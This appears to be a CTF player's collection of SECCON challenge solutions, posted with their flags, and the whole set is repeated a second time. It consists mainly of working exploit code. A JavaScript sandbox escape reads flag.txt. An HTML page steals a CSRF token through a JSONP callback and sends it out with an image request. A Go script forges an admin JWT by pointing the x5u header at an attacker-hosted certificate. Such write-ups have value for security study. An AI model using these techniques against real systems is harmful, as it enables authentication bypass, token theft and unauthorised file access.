po6ix/beginners-capsule.js

## beginners-capsule.js
function WeakMap(...e) {
  return {
    set: (...e)=>{
      console.log(e)
    },
    has: () => {
      console.log(87)
      return 1;
    }
  }
}
// SECCON{Player_WorldOfFantasy_StereoWorXxX_CapsLock_WaveRunner}

## capsule.js
function require() {
  console.log(process.mainModule.load('./flag.txt'))
}
// SECCON{HighCollarGirl_CutieCinem@Replay_PhonyPhonic_S.F.SoundFurniture}

## milk-1.html
<script>

setTimeout(() => {
    location = '/2.html';
}, 100);

</script>
<iframe src="https://milk.chal.seccon.jp/note.php?_=sdafhuiohsadfhbioujhsadifohfsdiauoh"></iframe>

## milk-2.html
<script>

function csrfTokenCallback(s) {
    // SECCON{I_am_heavily_concerning_about_unintended_sols_so_I_dont_put_any_spoiler_here_but_anyway_congrats!}
    (new Image).src = '/token?' + encodeURIComponent(s);
}

</script>

<script src="https://milk-api.chal.seccon.jp/csrf-token?_=sdafhuiohsadfhbioujhsadifohfsdiauoh"></script>

## milk-revenge.md

      
    Raw
  

              milk-revenge.md
            
          
    same with milk

SECCON{Okay_there_was_actually_unintended_solution_as_I_intended_blahblah}


## pasta.go
// add u5u, x5c both to jwt header and bruteforce
// SECCON{1_w0uLd_L1K3_70_347_r4M3N_1N5734d_0f_p4574}
package main

import (
	"crypto/x509"
	"encoding/pem"
	"fmt"
	"io/ioutil"

	"github.com/dgrijalva/jwt-go"
)

func main() {
	// user generated
	rawPrivateKey, err := ioutil.ReadFile("../service-b/service-b.key")
	if err != nil {
		fmt.Printf("error 1")

		return
	}
	privateKeyBlock, _ := pem.Decode(rawPrivateKey)
	privateKey, err := x509.ParsePKCS1PrivateKey(privateKeyBlock.Bytes)
	if err != nil {
		return
	}

	claims := jwt.MapClaims{
		"sub":    "22222222222",
		"role":   "admin",
		"issuer": "service-b",
	}

	token := jwt.NewWithClaims(jwt.SigningMethodRS256, claims)
	// user generated and hosted
	token.Header["x5u"] = "https://p6.is/service-b.crt"
	// from jwt header server gives
	token.Header["x5c"] = []string{"MIIFPDCCAyQCFFEs6vyyH9KY4JpsT8W7/hRTyY9dMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNVBAYTAkpQMQ4wDAYDVQQIDAVUb2t5bzEPMA0GA1UECgwGU0VDQ09OMQswCQYDVQQLDAJDQTEaMBgGA1UEAwwRY2Euc2VjY29uLmV4YW1wbGUwHhcNMjAxMDEwMDM0MjE0WhcNMjMwNzA3MDM0MjE0WjBeMQswCQYDVQQGEwJKUDEOMAwGA1UECAwFVG9reW8xDzANBgNVBAoMBlNFQ0NPTjELMAkGA1UECwwCQ0ExITAfBgNVBAMMGHNlcnZpY2UtYi5zZWNjb24uZXhhbXBsZTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALj+zVp0vU0cMIvaJpf6BqTnyGdVty+ec3V7a640emrAh2sQ8Ya0FhDfs5sohfTbndK0XSMrmufe0Wlc4PS9RxX/6Vder/IX3hrxlVMMcIw4mPA+Jzv1hFmmlHfU4p2mkGREV32Be8aGfKB4+JcjNOSOCC+YttR+T+ynClGWVnjdxuHJTFnW50jsQgtJDVtSU/JmNlxCWQKc4az3lIAkRi8SoIEnPlrmEtqAFZXUlwqGAaePdhX+ygXlQEwYqF8+RyOpiYZrX9Wb5X3B94ujvI5kE3oVa3yzBPfQTMHakL0F1QwsKLAbC1wmrjR4EbQ+Xh5hYfkEW7jCLM1Qc1/aKykl7wHnhUztztSv+Ra4AYPJ49qGsACHRWJzSH8/gwmYK7dsGroqaZWfWHcw5cW1CE7Hn2fvTRtmTjxTRka/wI5U0aWG+PG7U7vntR+staxmCqaEXeyZ7QMNlCQJbHBvgkNbBRqPFLjUNKWr+qJpzO+GQ4B2U/6F1FqNdojSmWtckfjkBaztW1Ff9kXEhpMPVDVBzkYeYmDSi53e9joN+mNmFxOHpL8eXEdiWk8PA0OWOGSkVoRlj4sOX09hg6kYHbudyihNhTyv80FNhl1T+YI4O85R2i2DcudY6fffG7dSbkL7eaR+YUt+LSX3x26XMYRfrsrS9jVBh7GWFoM9ctmfAgMBAAEwDQYJKoZIhvcNAQELBQADggIBAAf5ro53BRGu8pU7CldUtL2JXNE364NVcjmirVDiwtyKoEeeyEz5K+WEl5RybiHvkHYnh0xH/Y14KYHNUypC4t2IJtsompaARUBZ7xx2YA0vHVkjmXwm96fbh5sUKLJfpt8gp/L57idWHnmOqlzS19n1gcsg/oE8mEJx70UIQTbT3eHGDxxhVujIqjxNJLaEop1vC+CSWtfoGzkvC5wt5krAlVRDjwPnLSKIPa52nrW9npnCOHYl4YYoXH5PS9RESHmVdW9y9jt/yzSIwisJRVCaBupBAcMmgDVnD1861Fb50Vf4ZN2DJrGSdtAN/QINnLtDW5vwn3zHNbGQSiAEnFhQSSx//jtD37kK/9AIslCgmH+NeVZ8i3mE/Vkl4CBYLmDjYdwt+OmrfM36eOiA5NkEfwevox6T8GGHop1lIsC/ERIh9hAkv5P2x21p6RBUWr4XpaHCdMnq+zknWsFuWXcGYRZ77AYZuiZx8xDIjAqqQHGNJbaalckw1xSS0WBE8nI2C0Wkm8cEQjSHLfV4vjT1Pd1taDSyVW2jsgqNIr8kQs1Hc1ivwEbwp/o9FlEcMc+sSVjRqZbymkpV5XcgDMvsyevMDmpMB622n9sZo6WhFBULUv78DR2pYxbFrnCOIdrGIpG5whX/eNjRG8fx8bibFUINYtZlvJLpHGAJ8rg2"}
	tokenStr, err := token.SignedString(privateKey)

	fmt.Printf("%s\n", tokenStr)


}
	function WeakMap(...e) {
	return {
	set: (...e)=>{
	console.log(e)
	},
	has: () => {
	console.log(87)
	return 1;
	}
	}
	}
	// SECCON{Player_WorldOfFantasy_StereoWorXxX_CapsLock_WaveRunner}
	function require() {
	console.log(process.mainModule.load('./flag.txt'))
	}
	// SECCON{HighCollarGirl_CutieCinem@Replay_PhonyPhonic_S.F.SoundFurniture}
	<script>

	setTimeout(() => {
	location = '/2.html';
	}, 100);

	</script>
	<iframe src="https://milk.chal.seccon.jp/note.php?_=sdafhuiohsadfhbioujhsadifohfsdiauoh"></iframe>
	<script>

	function csrfTokenCallback(s) {
	// SECCON{I_am_heavily_concerning_about_unintended_sols_so_I_dont_put_any_spoiler_here_but_anyway_congrats!}
	(new Image).src = '/token?' + encodeURIComponent(s);
	}

	</script>

	<script src="https://milk-api.chal.seccon.jp/csrf-token?_=sdafhuiohsadfhbioujhsadifohfsdiauoh"></script>
	// add u5u, x5c both to jwt header and bruteforce
	// SECCON{1_w0uLd_L1K3_70_347_r4M3N_1N5734d_0f_p4574}
	package main

	import (
	"crypto/x509"
	"encoding/pem"
	"fmt"
	"io/ioutil"

	"github.com/dgrijalva/jwt-go"
	)

	func main() {
	// user generated
	rawPrivateKey, err := ioutil.ReadFile("../service-b/service-b.key")
	if err != nil {
	fmt.Printf("error 1")

	return
	}
	privateKeyBlock, _ := pem.Decode(rawPrivateKey)
	privateKey, err := x509.ParsePKCS1PrivateKey(privateKeyBlock.Bytes)
	if err != nil {
	return
	}

	claims := jwt.MapClaims{
	"sub": "22222222222",
	"role": "admin",
	"issuer": "service-b",
	}

	token := jwt.NewWithClaims(jwt.SigningMethodRS256, claims)
	// user generated and hosted
	token.Header["x5u"] = "https://p6.is/service-b.crt"
	// from jwt header server gives
	token.Header["x5c"] = []string{"MIIFPDCCAyQCFFEs6vyyH9KY4JpsT8W7/hRTyY9dMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNVBAYTAkpQMQ4wDAYDVQQIDAVUb2t5bzEPMA0GA1UECgwGU0VDQ09OMQswCQYDVQQLDAJDQTEaMBgGA1UEAwwRY2Euc2VjY29uLmV4YW1wbGUwHhcNMjAxMDEwMDM0MjE0WhcNMjMwNzA3MDM0MjE0WjBeMQswCQYDVQQGEwJKUDEOMAwGA1UECAwFVG9reW8xDzANBgNVBAoMBlNFQ0NPTjELMAkGA1UECwwCQ0ExITAfBgNVBAMMGHNlcnZpY2UtYi5zZWNjb24uZXhhbXBsZTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALj+zVp0vU0cMIvaJpf6BqTnyGdVty+ec3V7a640emrAh2sQ8Ya0FhDfs5sohfTbndK0XSMrmufe0Wlc4PS9RxX/6Vder/IX3hrxlVMMcIw4mPA+Jzv1hFmmlHfU4p2mkGREV32Be8aGfKB4+JcjNOSOCC+YttR+T+ynClGWVnjdxuHJTFnW50jsQgtJDVtSU/JmNlxCWQKc4az3lIAkRi8SoIEnPlrmEtqAFZXUlwqGAaePdhX+ygXlQEwYqF8+RyOpiYZrX9Wb5X3B94ujvI5kE3oVa3yzBPfQTMHakL0F1QwsKLAbC1wmrjR4EbQ+Xh5hYfkEW7jCLM1Qc1/aKykl7wHnhUztztSv+Ra4AYPJ49qGsACHRWJzSH8/gwmYK7dsGroqaZWfWHcw5cW1CE7Hn2fvTRtmTjxTRka/wI5U0aWG+PG7U7vntR+staxmCqaEXeyZ7QMNlCQJbHBvgkNbBRqPFLjUNKWr+qJpzO+GQ4B2U/6F1FqNdojSmWtckfjkBaztW1Ff9kXEhpMPVDVBzkYeYmDSi53e9joN+mNmFxOHpL8eXEdiWk8PA0OWOGSkVoRlj4sOX09hg6kYHbudyihNhTyv80FNhl1T+YI4O85R2i2DcudY6fffG7dSbkL7eaR+YUt+LSX3x26XMYRfrsrS9jVBh7GWFoM9ctmfAgMBAAEwDQYJKoZIhvcNAQELBQADggIBAAf5ro53BRGu8pU7CldUtL2JXNE364NVcjmirVDiwtyKoEeeyEz5K+WEl5RybiHvkHYnh0xH/Y14KYHNUypC4t2IJtsompaARUBZ7xx2YA0vHVkjmXwm96fbh5sUKLJfpt8gp/L57idWHnmOqlzS19n1gcsg/oE8mEJx70UIQTbT3eHGDxxhVujIqjxNJLaEop1vC+CSWtfoGzkvC5wt5krAlVRDjwPnLSKIPa52nrW9npnCOHYl4YYoXH5PS9RESHmVdW9y9jt/yzSIwisJRVCaBupBAcMmgDVnD1861Fb50Vf4ZN2DJrGSdtAN/QINnLtDW5vwn3zHNbGQSiAEnFhQSSx//jtD37kK/9AIslCgmH+NeVZ8i3mE/Vkl4CBYLmDjYdwt+OmrfM36eOiA5NkEfwevox6T8GGHop1lIsC/ERIh9hAkv5P2x21p6RBUWr4XpaHCdMnq+zknWsFuWXcGYRZ77AYZuiZx8xDIjAqqQHGNJbaalckw1xSS0WBE8nI2C0Wkm8cEQjSHLfV4vjT1Pd1taDSyVW2jsgqNIr8kQs1Hc1ivwEbwp/o9FlEcMc+sSVjRqZbymkpV5XcgDMvsyevMDmpMB622n9sZo6WhFBULUv78DR2pYxbFrnCOIdrGIpG5whX/eNjRG8fx8bibFUINYtZlvJLpHGAJ8rg2"}
	tokenStr, err := token.SignedString(privateKey)

	fmt.Printf("%s\n", tokenStr)


	}